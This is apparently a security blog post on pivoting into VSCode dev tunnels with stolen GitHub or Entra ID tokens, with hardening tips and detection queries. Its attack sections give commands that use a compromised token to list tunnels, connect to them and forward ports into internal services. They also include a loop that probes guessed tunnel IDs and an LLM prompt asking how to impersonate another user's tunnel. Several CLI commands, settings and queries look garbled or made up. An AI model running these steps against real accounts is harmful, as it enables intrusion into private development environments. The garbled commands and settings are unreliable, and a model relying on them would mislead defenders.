Hackers’ New Playground: Exploiting VSCode Dev Tunnels for Cross-Cloud Pivoting – A Deep Dive + Video

Listen to this Post

Featured Image

Introduction:

Visual Studio Code dev tunnels provide developers with instant, secure remote access to local development environments without complex firewall rules. However, this convenience creates a blind spot: attackers who compromise GitHub or Entra ID credentials can enumerate and pivot into existing dev-tunnel servers, bypassing traditional perimeter defenses. This article dissects the dev-tunnels protocol, demonstrates real-world exploitation techniques, and offers actionable hardening guidance based on Adam Chester’s latest research.

Learning Objectives:

  • Understand the authentication and session management architecture of VSCode dev tunnels.
  • Learn how to enumerate active tunnels from compromised GitHub or Entra ID tokens using CLI tools.
  • Implement detection rules and configuration hardening to prevent unauthorized tunnel access.

You Should Know:

  1. Anatomy of VSCode Dev Tunnels – From Creation to Abuse
    The dev tunnels feature (introduced in VSCode 1.70) uses the `dev-tunnels` service under `devtunnels.ms` and Azure Relay. A tunnel creates an encrypted, publicly accessible endpoint (e.g., https://<tunnel-id>.eastus.devtunnels.ms) that forwards traffic to a local port. Authentication relies on GitHub OAuth or Entra ID tokens, and tunnels persist across reboots. Attackers who obtain a valid refresh token or session cookie can list, attach, and forward traffic through existing tunnels without re-authentication.

Step‑by‑step guide to inspect your own tunnels (defensive):

  • Linux/macOS:
    Install VSCode CLI if not present
    code --version
    
    List all active tunnels for the logged-in user
    code tunnel list
    Example output: 
    my-dev-tunnel (tunnel-id: 2a3b4c5d6e7f) -> http://localhost:3000
    
    Inspect tunnel details
    code tunnel show <tunnel-id>
    

  • Windows (PowerShell):

    Using VSCode CLI
    & "C:\Program Files\Microsoft VS Code\bin\code.cmd" tunnel list
    
    Alternatively, query the dev-tunnels API directly (requires bearer token)
    $token = (Get-Content ~/.config/code/token.json | ConvertFrom-Json).access_token
    Invoke-RestMethod -Uri "https://api.devtunnels.ms/tunnels?api-version=2023-05-01" -Headers @{Authorization="Bearer $token"}
    

2. Enumerating Active Tunnels via GitHub API (Post-Compromise)

Once an attacker holds a GitHub personal access token (PAT) or OAuth session, they can query the dev-tunnels service. The key insight: VSCode tunnels are tied to the user’s GitHub ID, and no separate MFA step is required to list tunnels.

Step‑by‑step attack simulation (authorized environment only):

  • Enumerate GitHub user ID:
    curl -H "Authorization: token YOUR_COMPROMISED_PAT" https://api.github.com/user | jq .id
    
  • Use that ID to request tunnel list (via dev-tunnels API):
    GITHUB_ID=1234567
    curl -X GET "https://api.devtunnels.ms/users/${GITHUB_ID}/tunnels?api-version=2023-05-01" \
    -H "Authorization: Bearer YOUR_COMPROMISED_PAT"
    
  • On Windows using PowerShell with `gh` (GitHub CLI):
    gh auth status
    gh api user --jq '.id'
    gh api "https://api.devtunnels.ms/users/$GITHUB_ID/tunnels?api-version=2023-05-01"
    
  1. Pivoting from Entra ID Access to Dev-Tunnel Servers
    Organizations using Entra ID (Azure AD) for VSCode authentication expose an even larger attack surface. With an Entra ID access token (e.g., from a stolen session cookie or compromised device), an attacker can directly connect to any tunnel owned by that identity – often leading to internal development servers, staging databases, or even CI/CD runners.

Step‑by‑step pivot using Azure CLI:

  • Authenticate with compromised Entra ID credentials (refresh token):
    az login --allow-no-subscriptions --tenant <tenant-id> --use-device-code
    Or using refresh token:
    az account get-access-token --resource "https://management.azure.com"
    
  • Extract token and call dev-tunnels API:
    ACCESS_TOKEN=$(az account get-access-token --resource "https://api.devtunnels.ms" --query accessToken -o tsv)
    curl -H "Authorization: Bearer $ACCESS_TOKEN" "https://api.devtunnels.ms/tunnels?api-version=2023-05-01"
    
  • Connect to a discovered tunnel endpoint:
    Tunnel URL example: https://abc123.eastus.devtunnels.ms
    curl -H "Authorization: Bearer $ACCESS_TOKEN" https://abc123.eastus.devtunnels.ms/api/health
    
  • Create a reverse port forward through the tunnel (Linux):
    code tunnel port forward --tunnel-id <id> --port 8888 --local 8080
    Now hit localhost:8080 to access remote internal service
    

4. Hardening Dev Tunnel Configurations – Mitigations

To prevent unauthorized pivoting, administrators must enforce conditional access policies and restrict tunnel creation to managed devices.

Step‑by‑step hardening guide:

  • Disable dev tunnels entirely via VSCode settings (Windows Registry / Linux settings.json):
    // In settings.json (Ctrl+Shift+P > Preferences: Open Settings JSON)
    {
    "remote.tunnels.access": "deny",
    "remote.tunnels.requireAuthentication": true
    }
    
  • Azure AD Conditional Access Policy:
    Require “Compliant device” or “Hybrid Azure AD joined” for the `devtunnels.ms` cloud app.

    PowerShell to list dev tunnels app ID
    Get-AzureADServicePrincipal -SearchString "Visual Studio Code Tunnel"
    
  • GitHub Enterprise policy: Restrict tunnel creation to specific IP ranges using organization policies → Actions → General → Policies.
  • Monitor for anomalous tunnel enumeration: Alert on `ListTunnels` API calls from unusual locations.

5. Detection – Logging and SIEM Queries

Most organizations do not audit dev-tunnel activity. Enable diagnostic logs for Azure Relay and monitor VSCode extension telemetry.

Useful Splunk/KQL queries:

  • Azure Monitor (KQL) for tunnel creation:
    AADNonInteractiveUserSignInLogs
    | where AppDisplayName contains "tunnel"
    | where ConditionalAccessStatus != "success"
    | project TimeGenerated, UserPrincipalName, IPAddress, TunnelId = parse_json(AuthenticationDetails)[bash].tokenClaims['tunnel-id']
    
  • Linux audit rule for `code tunnel` execution:
    auditctl -w /usr/bin/code -k vscode_tunnel
    ausearch -k vscode_tunnel --format text | grep "tunnel"
    
  • Windows Event Log monitoring (PowerShell):
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object {$_.Message -like 'code.exetunnel'}
    
  1. Leveraging LLMs for Protocol Research (Reflections from Adam Chester)
    Using large language models from the start of research accelerates reverse-engineering undocumented protocols. In this case, ChatGPT-4 and Claude were fed raw dev-tunnels HTTP traces, producing struct definitions and attack surface hypotheses. However, LLMs still miss nuanced state-machine bugs.

Step‑by‑step tutorial for AI-assisted protocol analysis:

1. Capture traffic with `mitmproxy` or `tcpdump`:

tcpdump -i eth0 -w tunnels.pcap host api.devtunnels.ms

2. Convert packets to JSON/text and feed to an LLM with prompt:
“Extract all HTTP headers, endpoints, and authentication flows from this TLS-decoded session”
3. Ask for potential injection points: “Which fields could be manipulated to impersonate another user’s tunnel?”
4. Validate LLM suggestions with small fuzzing scripts (e.g., `ffuf` or custom Python).

import requests
headers = {"Authorization": f"Bearer {token}"}
for tunnel_id in ["123", "456"]:
r = requests.get(f"https://api.devtunnels.ms/tunnels/{tunnel_id}", headers=headers)
print(r.status_code, tunnel_id)

What Undercode Say:

  • Key Takeaway 1: Dev tunnels are a forgotten attack vector – they bypass network controls, persist after device loss, and are rarely audited.
  • Key Takeaway 2: Identity compromise (GitHub/Entra ID) trumps all network segmentation; securing tokens with device-bound credentials and strict conditional access is non-negotiable.

Analysis: The research highlights a classic trade-off between developer productivity and security. Attackers no longer need RCE on a target; they just need a valid cloud identity. Traditional EDR and firewalls miss outbound tunnel enumeration because it looks like legitimate VSCode traffic. Organizations must adopt zero-trust principles for developer tooling – treat every tunnel as a potential backdoor. Moreover, the integration of LLMs in attack research lowers the barrier for reverse‑engineering proprietary protocols, meaning defenders must assume that any undocumented API will be mapped and abused within days of release.

Prediction:

Within 18 months, we will see targeted ransomware groups pivoting through VSCode dev tunnels as a primary lateral movement technique, bypassing VPNs and ZTNA solutions. Microsoft will be forced to introduce mandatory MFA for every dev-tunnel session and deprecate long-lived PATs. Open-source detection rules (Sigma/YARA) for tunnel abuse will become as common as those for PsExec. Defenders who proactively restrict dev tunnels to short-lived, audited sessions will stay ahead; those who ignore them will face internal-network compromise from a single stolen GitHub cookie.

▶️ Related Video (80% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Xpn My – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky